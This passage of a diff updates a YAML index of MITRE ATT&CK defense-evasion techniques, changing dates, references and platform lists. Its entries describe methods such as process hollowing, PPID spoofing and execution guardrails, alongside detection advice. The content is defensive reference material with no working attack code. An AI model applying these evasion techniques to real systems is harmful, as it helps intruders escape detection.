+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1218.005:
     technique:
@@ -8136,7 +8241,7 @@ defense-evasion:
       - source_name: LOLBAS Mshta
         url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
         description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T20:38:28.802Z'
       name: 'Signed Binary Proxy Execution: Mshta'
       description: "Adversaries may abuse mshta.exe to proxy execution of malicious
         .hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -8174,68 +8279,72 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.005
     atomic_tests: []
   T1480:
     technique:
+      modified: '2024-06-07T14:30:23.491Z'
+      name: Execution Guardrails
+      description: |-
+        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+        Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Nick Carr, Mandiant
+      x_mitre_deprecated: false
+      x_mitre_detection: Detecting the use of guardrails may be difficult depending
+        on the implementation. Monitoring for suspicious processes being spawned that
+        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+        especially in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Nick Carr, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      x_mitre_defense_bypassed:
+      - Anti-virus
+      - Host Forensic Analysis
+      - Signature-based Detection
+      - Static File Analysis
       type: attack-pattern
       id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
       created: '2019-01-31T02:10:08.261Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1480
         url: https://attack.mitre.org/techniques/T1480
+        external_id: T1480
       - source_name: FireEye Outlook Dec 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
         description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
           the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
           June 23, 2020.'
+        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+      - source_name: Trellix-Qakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved June 7, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: FireEye Kevin Mandia Guardrails
-        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
         description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
           U.S. malware is more restrained than adversaries'. Retrieved January 17,
           2019.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
-        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Execution Guardrails
-      x_mitre_detection: Detecting the use of guardrails may be difficult depending
-        on the implementation. Monitoring for suspicious processes being spawned that
-        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
-        especially in a short period of time, may aid in detection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Command: Command Execution'
-      x_mitre_defense_bypassed:
-      - Anti-virus
-      - Host Forensic Analysis
-      - Signature-based Detection
-      - Static File Analysis
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.001:
     technique:
@@ -8293,7 +8402,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1205.001:
@@ -8319,7 +8427,7 @@ defense-evasion:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -8344,8 +8452,6 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.012:
     technique:
@@ -8406,7 +8512,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.002:
     technique:
@@ -8479,7 +8584,7 @@ defense-evasion:
         <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).(Citation:
         Hide GDM User Accounts) Display Managers are not anchored to specific distributions
         and may be changed by a user or adversary."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T02:31:01.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Hide Artifacts: Hidden Users'
       x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -8508,7 +8613,6 @@ defense-evasion:
       - 'User Account: User Account Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.002
     atomic_tests: []
   T1134.003:
@@ -8572,11 +8676,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.940Z'
       name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
@@ -8661,12 +8764,11 @@ defense-evasion:
         url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1562.003
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -8741,45 +8843,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -8803,6 +8870,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -8813,9 +8883,14 @@ defense-evasion:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -8825,8 +8900,35 @@ defense-evasion:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1134.004:
     technique:
@@ -8883,7 +8985,7 @@ defense-evasion:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -8908,7 +9010,6 @@ defense-evasion:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1055.014:
@@ -8979,7 +9080,7 @@ defense-evasion:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -9006,11 +9107,10 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -9064,7 +9164,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1574.013:
     technique:
@@ -9100,7 +9199,7 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -9126,8 +9225,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.004:
     technique:
@@ -9153,7 +9250,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -9175,8 +9272,6 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1218.001:
     technique:
@@ -9242,12 +9337,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.001
     atomic_tests: []
   T1070.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-13T17:15:56.948Z'
       name: 'Indicator Removal on Host: Network Share Connection Removal'
       description: 'Adversaries may remove share connections that are no longer useful
         in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -9302,7 +9396,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.005
     atomic_tests: []
   T1562.001:
@@ -9450,7 +9543,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.001
     atomic_tests: []
   T1601:
@@ -9477,7 +9569,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:47.635Z'
       name: Modify System Image
       description: |-
         Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -9512,8 +9604,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574:
     technique:
@@ -9579,7 +9669,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.005:
     technique:
@@ -9605,7 +9694,7 @@ defense-evasion:
         Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
 
         A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:07:48.062Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Indicator Removal from Tools
       x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -9630,11 +9719,10 @@ defense-evasion:
       - Signature-based detection
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -9651,7 +9739,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -9661,7 +9748,7 @@ defense-evasion:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -9670,19 +9757,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -9730,11 +9815,12 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -9802,18 +9888,17 @@ defense-evasion:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1564.009:
@@ -9860,7 +9945,7 @@ defense-evasion:
         Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
 
         Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:10:23.890Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Resource Forking
       x_mitre_detection: "Identify files with the <code>com.apple.ResourceFork</code>
@@ -9882,7 +9967,6 @@ defense-evasion:
       - Gatekeeper
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027:
     technique:
@@ -9957,6 +10041,7 @@ defense-evasion:
       - 'Script: Script Execution'
       - 'File: File Creation'
       - 'Module: Module Load'
+      - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'File: File Metadata'
       - 'Process: OS API Execution'
@@ -10016,12 +10101,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
